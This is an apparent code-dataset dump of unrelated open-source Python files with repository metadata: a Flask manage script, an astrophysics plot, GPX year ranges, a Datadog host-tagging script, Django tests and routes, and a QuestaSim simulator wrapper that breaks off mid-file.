argparse.ArgumentParser(description=cm.availableCommands(), formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("subcommand", help="subcommand to run (see list above)") parser.add_argument("ipaddress", nargs='?', default=DEFAULT_IP, help="address and port to run on (i.e. {0})".format(DEFAULT_IP)) def livereload_check(): check = subprocess.call("lsof -n -i4TCP:{}".format(CFG['network']["port"]), shell=True) if check == 0: output = subprocess.check_output( "ps -ef | egrep 'python manage.py|gunicorn' | egrep -v grep | awk '{print $3}'", shell=True).decode().strip() for _pid in output.split("\n"): pypid = int(_pid) os.kill(pypid, signal.SIGKILL) log.debug("Discovered rogue Python process: {0}".format(pypid)) log.debug("Killing PID {0}...".format(pypid)) else: log.debug(" No rogue Python process running") # Take in command line input for configuration try: args = parser.parse_args() cmd = args.subcommand addr = args.ipaddress.split(':') cm.configure({ 'host': addr[0], 'port': addr[1], }) cm.run(cmd) except KeyboardInterrupt: if 'FLASK_LIVE_RELOAD' in os.environ and os.environ['FLASK_LIVE_RELOAD'] == 'true': livereload_check() except: if len(sys.argv) == 1: log.debug(cm.availableCommands()) sys.exit(0)
1,655
-7
256
1e2d804940cb39ed13692c328011679d3bd4c173
2,285
py
Python
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
1
2019-12-28T22:47:51.000Z
2019-12-28T22:47:51.000Z
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
null
null
null
examples/textbook/salpeter.py
joshuawall/amuse
c2034074ee76c08057c4faa96c32044ab40952e9
[ "Apache-2.0" ]
2
2021-11-19T04:41:37.000Z
2021-11-20T02:11:17.000Z
from amuse.lab import new_powerlaw_mass_distribution ###BOOKLISTSTART### import numpy import math from amuse.units import units from matplotlib import pyplot from prepare_figure import figure_frame, get_distinct ###BOOKLISTSTOP### if __name__ in ('__main__', '__plot__'): o, arguments = new_option_parser().parse_args() numpy.random.seed(31415) generate_power_law_mass_function(**o.__dict__)
36.854839
76
0.623632
from amuse.lab import new_powerlaw_mass_distribution def generate_power_law_mass_function(N, Mmin, Mmax, ximf): masses = new_powerlaw_mass_distribution(N, Mmin, Mmax, ximf) plot_mass_function(masses, ximf) ###BOOKLISTSTART### import numpy import math from amuse.units import units from matplotlib import pyplot from prepare_figure import figure_frame, get_distinct def plot_mass_function(masses, ximf): Mmin = masses.min() Mmax = masses.max() lm = math.log10(0.5*Mmin.value_in(units.MSun)) lM = math.log10(1.5*Mmax.value_in(units.MSun)) bins = 10**numpy.linspace(lm, lM, 51) Nbin, bin_edges= numpy.histogram(masses.value_in(units.MSun), bins=bins) y = Nbin / (bin_edges[1:] - bin_edges[:-1]) x = (bin_edges[1:] + bin_edges[:-1]) / 2.0 for i in range(len(y)): y[i] = max(y[i], 1.e-10) fig, ax = figure_frame("M$_\odot$", "N", xsize=12, ysize=8) colors = get_distinct(2) pyplot.scatter(x, y, s=100, c=colors[0], lw=0) c = ((Mmax.value_in(units.MSun)**(ximf+1)) \ - (Mmin.value_in(units.MSun)**(ximf+1))) / (ximf+1) pyplot.plot(x, len(masses)/c * (x**ximf), c=colors[1]) pyplot.loglog() save_file = "salpeter.png" pyplot.savefig(save_file) print '\nSaved figure in file', save_file,'\n' pyplot.show() ###BOOKLISTSTOP### def new_option_parser(): from amuse.units.optparse import OptionParser result = OptionParser() result.add_option("-N", dest="N", type="int",default = 1000, help="number of stars [10]") result.add_option("-m", unit=units.MSun, dest="Mmin", type="float",default = 1|units.MSun, help="minimum mass of the mass function [0.1] %unit") result.add_option("-M", unit=units.MSun, dest="Mmax", type="float",default = 100|units.MSun, help="maximum mass of the mass function [100] %unit") result.add_option("-x", dest="ximf", type="float",default = -2.35, help="mass function slope [-2.35]") return result if __name__ in ('__main__', '__plot__'): o, arguments = new_option_parser().parse_args() numpy.random.seed(31415) generate_power_law_mass_function(**o.__dict__)
1,808
0
69
fca339414723ecddd70b58456b989c6b107a2352
3,396
py
Python
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
1
2021-07-09T02:57:08.000Z
2021-07-09T02:57:08.000Z
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
null
null
null
gpxtrackposter/year_range.py
narfel/GpxTrackPoster
57aa34feb43f8b76ef40d1500067e532d2ff439a
[ "MIT" ]
null
null
null
"""Represent a range of years, with ability to update based on a track""" # Copyright 2016-2020 Florian Pigorsch & Contributors. All rights reserved. # # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import datetime import re import typing class YearRange: """Represent a range of years, with ability to update based on a track Attributes: from_year: First year in range (lower) to_year: Last year in range (higher) Methods: parse: Parse a string into lower and upper bounds add: Adjust bounds based on a track contains: If track is contained in the range count: Number of years in range """ def __init__(self) -> None: """Inits YearRange with empty bounds -- to be built after init""" self.from_year: typing.Optional[int] = None self.to_year: typing.Optional[int] = None def parse(self, s: str) -> bool: """Parse a plaintext range of years into a pair of years Attempt to turn the input string into a pair of year values, from_year and to_year. If one year is passed, both from_year and to_year will be set to that year. If a range like '2016-2018' is passed, from_year will be set to 2016, and to_year will be set to 2018. Args: s: A string representing a range of years or a single year Returns: True if the range was successfully parsed, False if not. """ if s == "all": self.from_year = None self.to_year = None return True m = re.match(r"^\d+$", s) if m: self.from_year = int(s) self.to_year = self.from_year return True m = re.match(r"^(\d+)-(\d+)$", s) if m: y1, y2 = int(m.group(1)), int(m.group(2)) if y1 <= y2: self.from_year = y1 self.to_year = y2 return True return False def add(self, t: datetime.datetime) -> None: """For the given t, update from_year and to_year to include that timestamp""" if self.from_year is None: self.from_year = t.year self.to_year = t.year return assert self.from_year is not None assert self.to_year is not None if t.year < self.from_year: self.from_year = t.year elif t.year > self.to_year: self.to_year = t.year def contains(self, t: datetime.datetime) -> bool: """Return True if current year range contains t, False if not""" if self.from_year is None: return True assert self.from_year is not None assert self.to_year is not None return self.from_year <= t.year <= self.to_year def count(self) -> int: """Return number of years contained in the current range""" if self.from_year is None: return 0 assert self.to_year is not None return 1 + self.to_year - self.from_year
32.653846
98
0.594229
"""Represent a range of years, with ability to update based on a track""" # Copyright 2016-2020 Florian Pigorsch & Contributors. All rights reserved. # # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import datetime import re import typing class YearRange: """Represent a range of years, with ability to update based on a track Attributes: from_year: First year in range (lower) to_year: Last year in range (higher) Methods: parse: Parse a string into lower and upper bounds add: Adjust bounds based on a track contains: If track is contained in the range count: Number of years in range """ def __init__(self) -> None: """Inits YearRange with empty bounds -- to be built after init""" self.from_year: typing.Optional[int] = None self.to_year: typing.Optional[int] = None def parse(self, s: str) -> bool: """Parse a plaintext range of years into a pair of years Attempt to turn the input string into a pair of year values, from_year and to_year. If one year is passed, both from_year and to_year will be set to that year. If a range like '2016-2018' is passed, from_year will be set to 2016, and to_year will be set to 2018. Args: s: A string representing a range of years or a single year Returns: True if the range was successfully parsed, False if not. """ if s == "all": self.from_year = None self.to_year = None return True m = re.match(r"^\d+$", s) if m: self.from_year = int(s) self.to_year = self.from_year return True m = re.match(r"^(\d+)-(\d+)$", s) if m: y1, y2 = int(m.group(1)), int(m.group(2)) if y1 <= y2: self.from_year = y1 self.to_year = y2 return True return False def clear(self) -> None: self.from_year = None self.to_year = None def add(self, t: datetime.datetime) -> None: """For the given t, update from_year and to_year to include that timestamp""" if self.from_year is None: self.from_year = t.year self.to_year = t.year return assert self.from_year is not None assert self.to_year is not None if t.year < self.from_year: self.from_year = t.year elif t.year > self.to_year: self.to_year = t.year def contains(self, t: datetime.datetime) -> bool: """Return True if current year range contains t, False if not""" if self.from_year is None: return True assert self.from_year is not None assert self.to_year is not None return self.from_year <= t.year <= self.to_year def count(self) -> int: """Return number of years contained in the current range""" if self.from_year is None: return 0 assert self.to_year is not None return 1 + self.to_year - self.from_year def iter(self) -> typing.Generator[int, None, None]: if self.from_year is None: return assert self.to_year is not None for year in range(self.from_year, self.to_year + 1): yield year
271
0
54
efb255992679f342c7ebd054a3ecc97828dfdb96
112
py
Python
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
null
null
null
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
null
null
null
moses/char_rnn/__init__.py
samadejacobs/moses
1fda9a06ef645f533191990cd10834e52ec29a37
[ "MIT" ]
3
2020-03-31T16:07:20.000Z
2021-06-21T16:15:57.000Z
from .config import get_parser as char_rnn_parser from .model import CharRNN from .trainer import CharRNNTrainer
37.333333
49
0.857143
from .config import get_parser as char_rnn_parser from .model import CharRNN from .trainer import CharRNNTrainer
0
0
0
5b54b094c6f4a462492a448757b9d3954d49c8d5
1,109
py
Python
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
pathSum.py
pflun/learningAlgorithms
3101e989488dfc8a56f1bf256a1c03a837fe7d97
[ "MIT" ]
null
null
null
# Definition for a binary tree node. from sortedArrayToBST import Solution test = Solution() head_node = test.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7]) test1 = Solution1() print test1.pathSum(head_node, 7) # 4 # 2 6 # 1 3 5 7
27.04878
93
0.555455
# Definition for a binary tree node. from sortedArrayToBST import Solution class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution1(object): def __init__(self): # Tip: instance variable unique to each instance (not really related to this problem) self.store = [] def pathSum(self, root, sum): ls = [] self.dfs(root, sum, ls) return self.store def dfs(self, root, target, ls): if root: if not root.left and not root.right: if root.val == target: ls.append(root.val) self.store.append(ls) # Tip: ls + [root.val] to pass tmp path if root.left: self.dfs(root.left, target - root.val, ls + [root.val]) if root.right: self.dfs(root.right, target - root.val, ls + [root.val]) test = Solution() head_node = test.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7]) test1 = Solution1() print test1.pathSum(head_node, 7) # 4 # 2 6 # 1 3 5 7
721
5
152
49ef48b7da7d171f74104bc9e7bd0238f46fb42b
2,239
py
Python
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
155
2017-01-04T16:45:57.000Z
2022-03-24T18:19:27.000Z
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
42
2017-03-02T21:20:10.000Z
2021-10-13T13:10:03.000Z
query_hosts_create_tags.py
nadaj/Miscellany
0c7beb9cb9f3552cf25075d847e5d3bd28054c71
[ "BSD-3-Clause" ]
127
2015-12-21T19:32:58.000Z
2022-03-10T12:03:36.000Z
import json import os import requests import pprint from datadog import initialize, api # source /opt/datadog/datadog-agent/venv/bin/activate DD_API_KEY = os.getenv('DD_API_KEY', '') DD_APP_KEY = os.getenv('DD_APP_KEY', '') options = { 'api_key': DD_API_KEY, 'app_key': DD_APP_KEY } initialize(**options) initial_filter_string = '' # string to query datadog api for matching hosts. this may return more hosts than you are looking for. query_key = 'host_name' # any key of the host object (i.e. 'platform', 'id') to use when iterating over the search results. host_name is default. query_string = 'splunk' # query string to run against search string create_tags = False # set to true to create tags on matchings hosts host_count = api.Hosts.search(filter=initial_filter_string)['total_matching'] print('%r hosts matching initial_filter_string' % host_count) num_req = host_count // 100 + 1 print('%r number of api requests to query all matching hosts' % num_req) matching_hosts = [] start_index = 0 for i in range(1, num_req+1): print('api request %r of %r' % (i, num_req)) host_list = api.Hosts.search(filter=initial_filter_string, sort_field='apps', count=100, start=start_index)['host_list'] start_index += 100 for host in host_list: matching_hosts.append(host) print('Matching host count: %r' % len(matching_hosts)) # run a second, more granular query to identify hosts all_hostnames = [] hosts_to_tag = [] for host in matching_hosts: host_name = host['host_name'] # get the host name for adding tags all_hostnames.append(host_name) value = host[query_key] # ex host['platform'], hosts['id'], etc if query_string in value: # contains, startswith, endswith, etc hosts_to_tag.append(host_name) print('identified host %s' % host_name) print('Host count: %r' % host_count) print('Unique host names: %r' % len(set(all_hostnames))) print('Hosts to tag: %r' % len(hosts_to_tag)) if create_tags: # add a tag to hosts for host_name in hosts_to_tag: res = api.Tag.create(host_name, tags=['tag_name:tag_value']) if 'errors' in res: print(res['errors']) else: print("Set 'create_tags' = True to create tags for matchings hosts.")
34.984375
146
0.712372
import json import os import requests import pprint from datadog import initialize, api # source /opt/datadog/datadog-agent/venv/bin/activate DD_API_KEY = os.getenv('DD_API_KEY', '') DD_APP_KEY = os.getenv('DD_APP_KEY', '') options = { 'api_key': DD_API_KEY, 'app_key': DD_APP_KEY } initialize(**options) initial_filter_string = '' # string to query datadog api for matching hosts. this may return more hosts than you are looking for. query_key = 'host_name' # any key of the host object (i.e. 'platform', 'id') to use when iterating over the search results. host_name is default. query_string = 'splunk' # query string to run against search string create_tags = False # set to true to create tags on matchings hosts host_count = api.Hosts.search(filter=initial_filter_string)['total_matching'] print('%r hosts matching initial_filter_string' % host_count) num_req = host_count // 100 + 1 print('%r number of api requests to query all matching hosts' % num_req) matching_hosts = [] start_index = 0 for i in range(1, num_req+1): print('api request %r of %r' % (i, num_req)) host_list = api.Hosts.search(filter=initial_filter_string, sort_field='apps', count=100, start=start_index)['host_list'] start_index += 100 for host in host_list: matching_hosts.append(host) print('Matching host count: %r' % len(matching_hosts)) # run a second, more granular query to identify hosts all_hostnames = [] hosts_to_tag = [] for host in matching_hosts: host_name = host['host_name'] # get the host name for adding tags all_hostnames.append(host_name) value = host[query_key] # ex host['platform'], hosts['id'], etc if query_string in value: # contains, startswith, endswith, etc hosts_to_tag.append(host_name) print('identified host %s' % host_name) print('Host count: %r' % host_count) print('Unique host names: %r' % len(set(all_hostnames))) print('Hosts to tag: %r' % len(hosts_to_tag)) if create_tags: # add a tag to hosts for host_name in hosts_to_tag: res = api.Tag.create(host_name, tags=['tag_name:tag_value']) if 'errors' in res: print(res['errors']) else: print("Set 'create_tags' = True to create tags for matchings hosts.")
0
0
0
5100719deadc1ab5f5956fa7c4b8e9f8c772c93c
567
py
Python
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
1
2021-05-08T07:45:19.000Z
2021-05-08T07:45:19.000Z
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
null
null
null
linter.py
CudaText-addons/cuda_lint_innosetup
159b119f5c007f36e29c1d005188c6ec2ece1784
[ "MIT" ]
null
null
null
# # linter.py # Linter for SublimeLinter3, a code checking framework for Sublime Text 3 # # Written by Jan T. Sott # Copyright (c) 2017 Jan T. Sott # # License: MIT # Ported to CudaLint by Alexey T. # from cuda_lint import Linter, util class Iscc(Linter): """Provides an interface to the ISCC executable.""" cmd = ('ISCC.exe', '/Q', '/O-', '@') syntax = 'Inno Setup' regex = ( r'^Error on line (?P<line>\d+) in (?P<file>.*\.iss): (?P<message>.+)$' ) multiline = True error_stream = util.STREAM_STDERR line_col_base = (0, 1)
22.68
78
0.61552
# # linter.py # Linter for SublimeLinter3, a code checking framework for Sublime Text 3 # # Written by Jan T. Sott # Copyright (c) 2017 Jan T. Sott # # License: MIT # Ported to CudaLint by Alexey T. # from cuda_lint import Linter, util class Iscc(Linter): """Provides an interface to the ISCC executable.""" cmd = ('ISCC.exe', '/Q', '/O-', '@') syntax = 'Inno Setup' regex = ( r'^Error on line (?P<line>\d+) in (?P<file>.*\.iss): (?P<message>.+)$' ) multiline = True error_stream = util.STREAM_STDERR line_col_base = (0, 1)
0
0
0
66146d833c1b018ec787f7efcec2dd545d37bf12
999
py
Python
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
36
2021-01-18T11:58:17.000Z
2021-12-09T21:40:29.000Z
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
2
2021-07-02T04:07:58.000Z
2021-08-22T21:23:33.000Z
Authentication/tests.py
MuhammadSalahAli/TolkProject
38e655be8f1776c216f1e7b3a727b39a1ea06cfb
[ "MIT" ]
7
2021-08-09T02:21:49.000Z
2022-02-06T11:04:04.000Z
from django.test import TestCase from django.contrib.auth import get_user_model import json User = get_user_model()
37
113
0.697698
from django.test import TestCase from django.contrib.auth import get_user_model import json User = get_user_model() class TestAuthentication(TestCase): def setUp(self) -> None: self.user = User.objects.create_user(email='guest_1@user.com') self.user.set_password('password') self.user.save() def test_bad_credentials(self): response = self.client.post('/api/login/', data={'email': 'guest_1user.com', 'password': 'bad password'}) self.assertEqual(response.status_code, 400) is_authenticated = self.client.get('/api/authenticated/').data['is_authenticated'] self.assertFalse(is_authenticated) def test_user_authentication(self): response = self.client.post('/api/login/', data={'email': 'guest_1@user.com', 'password': 'password'}) self.assertEqual(response.status_code, 202) is_authenticated = self.client.get('/api/authenticated/').data['is_authenticated'] self.assertTrue(is_authenticated)
763
14
104
decee34e0333f716cf45f2e9c465d3d7ff1c09fd
2,109
py
Python
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
1
2021-06-08T02:37:04.000Z
2021-06-08T02:37:04.000Z
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
null
null
null
core/urls.py
Aju100/WikimediaDataProject
f31e7856e49f510628e2ce65f40844b1f762a546
[ "MIT" ]
null
null
null
from django.urls import path, include from . import views urlpatterns = [ path('', views.index, name='index'), path('populated_cities', views.populated_cities_query, name ='populated_cities'), path('start_tour_cities', views.start_tour_cities, name ='start_tour_cities'), path('stop_tour_cities', views.stop_tour_cities, name ='stop_tour_cities'), path('premierLeague_stadiums', views.premierLeague_stadiums_query, name ='premierLeague_stadiums'), path('start_tour_stadiums', views.start_tour_stadiums, name ='start_tour_stadiums'), path('stop_tour_stadiums', views.stop_tour_stadiums, name ='stop_tour_stadiums'), path('longest_rivers', views.longest_rivers_query, name ='longest_rivers'), path('tour_experience', views.tour_experience, name ='tour_experience'), path('line_track_experience', views.line_track_experience, name ='line_track_experience'), path('stop_experience', views.stop_experience, name ='stop_experience'), path('spanish_airports', views.spanish_airports_query, name ='spanish_airports'), path('start_tour_airports', views.start_tour_airports, name ='start_tour_airports'), path('stop_tour_airports', views.stop_tour_airports, name ='stop_tour_airports'), path('summer_olympic_games_aux', views.olympic_games_query_aux, name ='summer_olympic_games_aux'), path('summer_olympic_games', views.olympic_games_query, name ='summer_olympic_games'), path('try_demo', views.try_demo, name ='try_demo'), path('start_lleida_tour', views.start_lleida_tour, name ='start_lleida_tour'), path('start_bayern_tour', views.start_bayern_tour, name ='start_bayern_tour'), path('start_barcelona92', views.start_barcelona92, name ='start_barcelona92'), path('stop_tour_demo', views.stop_tour_demo, name ='stop_tour_demo'), path('clear_KML_folder', views.clear_KML_folder, name ='clear_KML_folder'), path('stop_current_tour', views.stop_current_tour, name ='stop_current_tour'), path('relaunch_LG', views.relaunch_LG, name ='relaunch_LG'), path('clear_LG_cache', views.clear_LG_cache, name ='clear_LG_cache') ]
70.3
103
0.766714
from django.urls import path, include from . import views urlpatterns = [ path('', views.index, name='index'), path('populated_cities', views.populated_cities_query, name ='populated_cities'), path('start_tour_cities', views.start_tour_cities, name ='start_tour_cities'), path('stop_tour_cities', views.stop_tour_cities, name ='stop_tour_cities'), path('premierLeague_stadiums', views.premierLeague_stadiums_query, name ='premierLeague_stadiums'), path('start_tour_stadiums', views.start_tour_stadiums, name ='start_tour_stadiums'), path('stop_tour_stadiums', views.stop_tour_stadiums, name ='stop_tour_stadiums'), path('longest_rivers', views.longest_rivers_query, name ='longest_rivers'), path('tour_experience', views.tour_experience, name ='tour_experience'), path('line_track_experience', views.line_track_experience, name ='line_track_experience'), path('stop_experience', views.stop_experience, name ='stop_experience'), path('spanish_airports', views.spanish_airports_query, name ='spanish_airports'), path('start_tour_airports', views.start_tour_airports, name ='start_tour_airports'), path('stop_tour_airports', views.stop_tour_airports, name ='stop_tour_airports'), path('summer_olympic_games_aux', views.olympic_games_query_aux, name ='summer_olympic_games_aux'), path('summer_olympic_games', views.olympic_games_query, name ='summer_olympic_games'), path('try_demo', views.try_demo, name ='try_demo'), path('start_lleida_tour', views.start_lleida_tour, name ='start_lleida_tour'), path('start_bayern_tour', views.start_bayern_tour, name ='start_bayern_tour'), path('start_barcelona92', views.start_barcelona92, name ='start_barcelona92'), path('stop_tour_demo', views.stop_tour_demo, name ='stop_tour_demo'), path('clear_KML_folder', views.clear_KML_folder, name ='clear_KML_folder'), path('stop_current_tour', views.stop_current_tour, name ='stop_current_tour'), path('relaunch_LG', views.relaunch_LG, name ='relaunch_LG'), path('clear_LG_cache', views.clear_LG_cache, name ='clear_LG_cache') ]
0
0
0
c91cf546e259967fe077b3bc9f5679adb51c38a3
1,130
py
Python
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
import Enum RF = Enum.enum(ORIGINAL=0, PIECE=1, EN_LINE1=2, EN_LINE2=3)
28.974359
72
0.69646
import Enum RF = Enum.enum(ORIGINAL=0, PIECE=1, EN_LINE1=2, EN_LINE2=3) def refactWithLine(talk, countOfLine): count = 0 talk.ResetStartOfParagraph(False) subtitle = talk.subtitles subtitle[0].startOfParagraph = True for i in xrange(1,len(subtitle)): if(subtitle[i].content[-1] == "." or subtitle[i].content[-1] == "?"): count = count + 1 if(i < len(subtitle)-1 and count == countOfLine): subtitle[i+1].startOfParagraph = True count = 0 def methodOriginal(enTalk, chTalk): return def methodPIECE(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) enTalk.ResetStartOfParagraph(True) def methodEN_LINE1(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) refactWithLine(enTalk, 1) def methodEN_LINE2(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) refactWithLine(enTalk, 2) def RefactStartOfParagraph(enTalk, chTalk, refactType = RF.ORIGINAL): doMethod = { RF.ORIGINAL : methodOriginal, RF.PIECE : methodPIECE, RF.EN_LINE1 : methodEN_LINE1, RF.EN_LINE2 : methodEN_LINE2, } doMethod[int(refactType)](enTalk, chTalk)
899
0
158
793d195c49c731b9089c998b075845197f2a39b1
13,520
py
Python
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
2
2018-03-17T18:14:52.000Z
2021-05-02T06:47:16.000Z
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
null
null
null
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
1
2021-05-02T06:47:19.000Z
2021-05-02T06:47:19.000Z
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*- # vim: tabstop=2:shiftwidth=2:noexpandtab # kate: tab-width 2; replace-tabs off; indent-width 2; # # ============================================================================== # Authors: Patrick Lehmann # Martin Zabel # # Python Module: Mentor QuestaSim simulator. # # License: # ============================================================================== # Copyright 2007-2016 Technische Universitaet Dresden - Germany # Chair of VLSI-Design, Diagnostics and Architecture # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # # load dependencies from pathlib import Path from textwrap import dedent from Base.Project import FileTypes, ToolChain, Tool from DataBase.Config import Vendors from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator __api__ = [ 'Simulator' ] __all__ = __api__
46.30137
161
0.723817
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*- # vim: tabstop=2:shiftwidth=2:noexpandtab # kate: tab-width 2; replace-tabs off; indent-width 2; # # ============================================================================== # Authors: Patrick Lehmann # Martin Zabel # # Python Module: Mentor QuestaSim simulator. # # License: # ============================================================================== # Copyright 2007-2016 Technische Universitaet Dresden - Germany # Chair of VLSI-Design, Diagnostics and Architecture # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # # load dependencies from pathlib import Path from textwrap import dedent from Base.Project import FileTypes, ToolChain, Tool from DataBase.Config import Vendors from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator __api__ = [ 'Simulator' ] __all__ = __api__ class Simulator(BaseSimulator): TOOL_CHAIN = ToolChain.Mentor_QuestaSim TOOL = Tool.Mentor_vSim def __init__(self, host, dryRun, simulationSteps): # A separate elaboration step is not implemented in QuestaSim simulationSteps &= ~SimulationSteps.Elaborate super().__init__(host, dryRun, simulationSteps) vSimSimulatorFiles = host.PoCConfig['CONFIG.DirectoryNames']['QuestaSimFiles'] self.Directories.Working = host.Directories.Temp / vSimSimulatorFiles self.Directories.PreCompiled = host.Directories.PreCompiled / vSimSimulatorFiles if (SimulationSteps.CleanUpBefore in self._simulationSteps): pass if (SimulationSteps.Prepare in self._simulationSteps): self._PrepareSimulationEnvironment() self._PrepareSimulator() def _PrepareSimulator(self): # create the QuestaSim executable factory self.LogVerbose("Preparing Mentor simulator.") # for sectionName in ['INSTALL.Mentor.QuestaSim', 'INSTALL.Mentor.ModelSim', 'INSTALL.Altera.ModelSim']: # if (len(self.Host.PoCConfig.options(sectionName)) != 0): # break # else: # XXX: check SectionName if ModelSim is configured # raise NotConfiguredException( # "Neither Mentor Graphics QuestaSim, ModelSim PE nor ModelSim Altera-Edition are configured on this system.") # questaSection = self.Host.PoCConfig[sectionName] # binaryPath = Path(questaSection['BinaryDirectory']) # version = questaSection['Version'] binaryPath = Path(self.Host.PoCConfig['INSTALL.ModelSim']['BinaryDirectory']) version = self.Host.PoCConfig['INSTALL.ModelSim']['Version'] self._toolChain = QuestaSim(self.Host.Platform, self.DryRun, binaryPath, version, logger=self.Logger) def Run(self, testbench, board, vhdlVersion, vhdlGenerics=None): # TODO: refactor into a ModelSim module, shared by QuestaSim and Cocotb (-> MixIn class)? # select modelsim.ini self._modelsimIniPath = self.Directories.PreCompiled if board.Device.Vendor is Vendors.Altera: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['AlteraSpecificFiles'] elif board.Device.Vendor is Vendors.Lattice: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['LatticeSpecificFiles'] elif board.Device.Vendor is Vendors.Xilinx: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['XilinxSpecificFiles'] self._modelsimIniPath /= "modelsim.ini" if not self._modelsimIniPath.exists(): raise SimulatorException("Modelsim ini file '{0!s}' not found.".format(self._modelsimIniPath)) \ from FileNotFoundError(str(self._modelsimIniPath)) super().Run(testbench, board, vhdlVersion, vhdlGenerics) def _RunAnalysis(self, _): # create a QuestaVHDLCompiler instance vlib = self._toolChain.GetVHDLLibraryTool() for lib in self._pocProject.VHDLLibraries: vlib.Parameters[vlib.SwitchLibraryName] = lib.Name vlib.CreateLibrary() # create a QuestaVHDLCompiler instance vcom = self._toolChain.GetVHDLCompiler() vcom.Parameters[vcom.FlagQuietMode] = True vcom.Parameters[vcom.FlagExplicit] = True vcom.Parameters[vcom.FlagRangeCheck] = True vcom.Parameters[vcom.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() vcom.Parameters[vcom.SwitchVHDLVersion] = repr(self._vhdlVersion) recompileScriptContent = dedent("""\ puts "Recompiling..." """) # run vcom compile for each VHDL file for file in self._pocProject.Files(fileType=FileTypes.VHDLSourceFile): if (not file.Path.exists()): raise SimulatorException("Cannot analyse '{0!s}'.".format(file.Path)) from FileNotFoundError(str(file.Path)) vcomLogFile = self.Directories.Working / (file.Path.stem + ".vcom.log") vcom.Parameters[vcom.SwitchVHDLLibrary] = file.LibraryName vcom.Parameters[vcom.ArgLogFile] = vcomLogFile vcom.Parameters[vcom.ArgSourceFile] = file.Path try: vcom.Compile() except QuestaSimException as ex: raise SimulatorException("Error while compiling '{0!s}'.".format(file.Path)) from ex if vcom.HasErrors: raise SkipableSimulatorException("Error while compiling '{0!s}'.".format(file.Path)) # delete empty log files if (vcomLogFile.stat().st_size == 0): try: vcomLogFile.unlink() except OSError as ex: raise SimulatorException("Error while deleting 